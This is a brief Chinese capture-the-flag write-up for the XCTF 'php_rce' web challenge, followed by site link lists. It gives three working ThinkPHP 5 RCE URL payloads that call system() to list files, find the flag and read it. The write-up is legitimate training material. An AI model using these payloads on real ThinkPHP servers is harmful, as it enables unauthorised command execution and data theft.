攻防世界-web-高手进阶区003-php_rce - 代码天地

攻防世界-web-高手进阶区003-php_rce

其他 2020-03-12 14:01:09 阅读次数: 0

1.thinkphp5 rce漏洞，构造payload，

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("ls");%27

2.寻找flag

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("find / -name 'flag'");%27

3.查看flag

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat ../../../flag");%27

4.漏洞详情可查看，https://blog.csdn.net/qq_40884727/article/details/101452478

猜你喜欢

转载自www.cnblogs.com/joker-vip/p/12468769.html

攻防世界-web-高手进阶区003-php_rce

攻防世界-web-高手进阶区-mfw

攻防世界-web -高手进阶区-PHP2

攻防世界（高手进阶区）——Web_php_include

攻防世界-web-高手进阶区-unserialize3

攻防世界-web-高手进阶区1-ics-06

攻防世界-web-高手进阶区-Training-WWW-Robots

攻防世界-web-高手进阶区002-Training-WWW-Robots

攻防世界-web-高手进阶区007-NaNNaNNaNNaN-Batman

攻防世界-web-高手进阶区017-supersqli

攻防世界-web-高手进阶区009-unserialize3

攻防世界-web-高手进阶区015-mfw

攻防世界-web-高手进阶区005-warmup

攻防世界-web-高手进阶区006-NewsCenter

【攻防世界 XCTF】 WEB 高手进阶 php_rce ——最全面、最直观的WP

攻防世界-高手进阶区web-CAT

攻防世界 web高手进阶区 2分题

攻防世界 web高手进阶区 1分题

攻防世界web高手进阶区-ics-06

攻防世界-Web高手进阶区-ics-05

攻防世界 Web高手进阶区 mfw

攻防世界Web 高手进阶区：Lottery

[攻防世界]-WEB高手进阶区-love_math

[攻防世界]-WEB高手进阶区-lottery

攻防世界（高手进阶区）——NewsCenter

攻防世界 misc高手进阶区

攻防世界——高手进阶区

攻防世界web高手区writeup

攻防世界Web高手区总结

攻防世界-web-新手练习区（5）-simple_php

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

周排行

Python环境安装与基础语法（1）——计算机基础知识

IMU预积分

ADAS中的LDW、FCW、BSD、LCA、ACC、AEB、APA、DMS代表的含义

B站笔试两道题

skyeye arm 硬件虚拟机环境的搭建

Web前端静态页面示例

数组-合并排序数组 II-简单

springcloud之版本问题启动报错

面向对象-------------匿名对象(六)

输入URL到页面呈现中间发生了什么？

每日归档

更多

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)